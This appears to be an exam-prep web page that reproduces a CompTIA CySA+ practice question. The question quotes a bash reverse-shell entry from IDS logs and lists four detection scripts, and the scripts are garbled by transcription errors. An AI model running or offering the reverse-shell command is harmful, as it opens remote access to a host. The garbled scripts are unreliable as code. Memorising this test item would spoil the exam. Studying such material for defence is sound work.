Summer Certification Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

CompTIA CyberSecurity Analyst CySA+ Certification Exam CS0-003 Question # 10 Topic 2 Discussion

CompTIA CyberSecurity Analyst CySA+ Certification Exam CS0-003 Question # 10 Topic 2 Discussion

CS0-003 Exam Topic 2 Question 10 Discussion:
Question #: 10
Topic #: 2

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i > & /dev/tcp/10.1.2.3/8080 0 > & 1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?


A.

#!/bin/bashnc 10.1.2.3 8080 -vv > dev/null & & echo " Malicious activity " Il echo " OK "


B.

#!/bin/bashps -fea | grep 8080 > dev/null & & echo " Malicious activity " I| echo " OK "


C.

#!/bin/bashls /opt/tcp/10.1.2.3/8080 > dev/null & & echo " Malicious activity " I| echo " OK "


D.

#!/bin/bashnetstat -antp Igrep 8080 > dev/null & & echo " Malicious activity " I| echo " OK "


Get Premium CS0-003 Questions

Contribute your Thoughts:


Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.